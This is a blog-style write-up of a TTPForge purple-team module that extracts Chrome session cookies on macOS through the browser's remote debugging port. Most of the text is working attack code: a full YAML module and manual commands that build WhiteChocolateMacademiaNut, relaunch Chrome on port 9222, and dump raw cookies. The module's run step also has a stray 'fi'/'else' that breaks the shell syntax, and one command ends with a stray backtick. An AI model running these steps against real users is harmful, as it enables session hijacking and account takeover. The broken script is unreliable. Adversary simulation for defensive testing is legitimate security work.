Extracting Cookies from Chromium Browser via Remote Debugging using TTPForge

We have created a new module in ForgeArmoury for TTPForge that extracts cookies from Chromium Browser via the remote debugging port, based on the WhiteChocolateMacademiaNut tool. The new module can be found here.

TTPForge and ForgeArmory

TTPForge is a purple teaming tool created by Meta’s security teams for adversarial simulation testing. It tests behaviors from MITRE ATT&CK TTPs, similar to tools like Atomic Red Team and MITRE Caldera. TTPForge is written in Golang, making it OS agnostic and uses YAML for easy readability and writing of new techniques. Along with TTPForge, Meta’s security team has developed ForgeArmory, which hosts all supported TTP modules.

WhiteChocolateMacademiaNut

WhiteChocolateMacademiaNut is a tool created by Justin Bui and inspired by mangopdf exploits the remote debugging port in Chromium browsers. By launching a browser with the remote debugging port flag, the tool interacts with the debug port to view open tabs, installed extensions, and cookies. This capability maps to MITRE ATT&CK Technique T1539 (Steal Web Session Cookie). Its non-requirement for root access makes it particularly useful in user contexts. This technique has proven effective in red team engagements for extracting cookies to access critical applications, gain persistence, or enable lateral movement.

"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &`

Running the TTPForge Module

Follow the instructions on the official TTPForge page for the most up-to-date information. The new TTP module can be found here.

Assuming TTPForge is installed:

ttpforge run forgearmory//credential-access/extract-cookies-from-chromium-browser/extract-cookies-from-chromium-browser.yaml

This would run extract-cookies-from-chromium-browser.yaml :

---
api_version: 2.0
uuid: 2cd87e28-d207-4cc2-9b61-644e32aeba61
name: extract-cookies-from-chromium-browser
description: Runs chromium-based browsers in debugger port and extracts cookies
requirements:
  platforms:
    - os: darwin
  superuser: false
mitre:
  tactics:
    - TA0006 Credential Access
  techniques:
    - T1539 Steal Web Session Cookie
steps:
  - name: setup
    inline: |
      # Determine the operating system
      OS=$(uname)
      if [[ "$OS" == "Darwin" ]]; then

        # Confirm that brew package manager is installed
        if ! command -v brew &> /dev/null; then
          echo "===> Error: Brew package manager is not installed on the current system. Please install to proceed."
          exit 1
        else
          echo "===> Confirmed: Brew is installed."

          # Confirm that golang utility is installed. If not, install it.
          if ! command -v go &> /dev/null; then
            echo "===> Error: Golang is not installed on the current system. Installing now."
            brew install golang
            if [ $? -ne 0 ]; then
              echo "===> Error: Failed to install Golang."
              exit 1
            fi
          else
            echo "===> Confirmed: Golang is installed."
          fi

          # Confirm that Google Chrome is installed
          if [ -d "/Applications/Google Chrome.app" ]; then
            echo "===> Confirmed: Google Chrome is installed."
          else
            echo "===> Error: Goolge Chrome is not installed on the current system. Installing now."
            brew install --cask google-chrome
            if [ $? -ne 0 ]; then
              echo "===> Error: Failed to install Google Chrome."
              exit 1
            fi
          fi
        fi
      else
        echo "Unsupported operating system."
        exit 27
      fi
  - name: clone-whitecocolatemacademianut
    inline: |
      git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
      cd WhiteChocolateMacademiaNut
      git checkout b024f72f6350fb62853f06052a8431d20e76db7a
    cleanup:
      inline: |
        echo "Removing WhiteChocolateMacademiaNut git repository"
        rm -rf WhiteChocolateMacademiaNut

  - name: build-whitecocolatemacademianut
    inline: |
      cd WhiteChocolateMacademiaNut
      go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
      go get github.com/akamensky/argparse
      go get golang.org/x/net/websocket
      go build -o WhiteChocolateMacademiaNut

  - name: run-whitecocolatemacademianut
    inline: |
      # Determine the operating system
      OS=$(uname)
      if [[ "$OS" == "Darwin" ]]; then
        # Open Chrome
        open -a "Google Chrome" "https://www.google.com" &
        sleep 5

        # Kill Chrome Process
        killall "Google Chrome"

        # Open Chrome with remote debugger port
        "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &
        sleep 5

        cd WhiteChocolateMacademiaNut
        ./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw
        if [ $? -ne 0 ]; then
          echo "Failed to run WhiteChocolateMacademiaNut."
          killall "Google Chrome"
          exit 1
        else
          echo "TTP Ran Successfully"
          killall "Google Chrome"
          exit 0
        fi
      fi
      else
        echo "Unsupported operating system."
        exit 27
      fi

Steps Breakdown

Setup: This step verifies the operating system and checks if Homebrew is installed. If Homebrew is present, it will install Golang and Google Chrome.
Clone WhiteChocolateMacademiaNut: This step clones the WhiteChocolateMacademiaNut repository from GitHub, specifically checking out commit b024f72f6350fb62853f06052a8431d20e76db7a. A cleanup step is also included to remove the repository after execution.
Build WhiteChocolateMacademiaNut: Using Golang, this step builds the WhiteChocolateMacademiaNut tool to ensure compatibility with the operating system.
Run WhiteChocolateMacademiaNut: This step simulates browser activity by opening and closing Google Chrome, then reopens it with the remote debugger port enabled on port 9222. WhiteChocolateMacademiaNut is then executed to extract cookies.

Manual Reproduction

# Assuming Homebrew is present, install Golang and Google Chrome
brew install golang
brew install --cask google-chrome

# Clone and build WhiteChocolateMacademiaNut
git clone https://github.com/slyd0g/WhiteChocolateMacademiaNut
cd WhiteChocolateMacademiaNut
go mod init github.com/slyd0g/WhiteChocolateMacademiaNut
go get github.com/akamensky/argparse
go get golang.org/x/net/websocket
go build -o WhiteChocolateMacademiaNut

# Simulate browser activity
open -a "Google Chrome" "https://www.google.com" &
killall "Google Chrome"

# Open Chrome with remote debugger port
"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --remote-debugging-port=9222 --restore-last-session --remote-allow-origins=http://localhost/ &

# Run WhiteChocolateMacademiaNut
./WhiteChocolateMacademiaNut --port 9222 --dump cookies --format raw

Conclusion

TTPForge is a useful tool to verify techniques, execute repeatable test and produce notable events on the TTPs. This new module demonstrates the simplicity to add new techniques to simulate realistic adversarial behavior, providing security teams with a robust method to test and improve their defenses.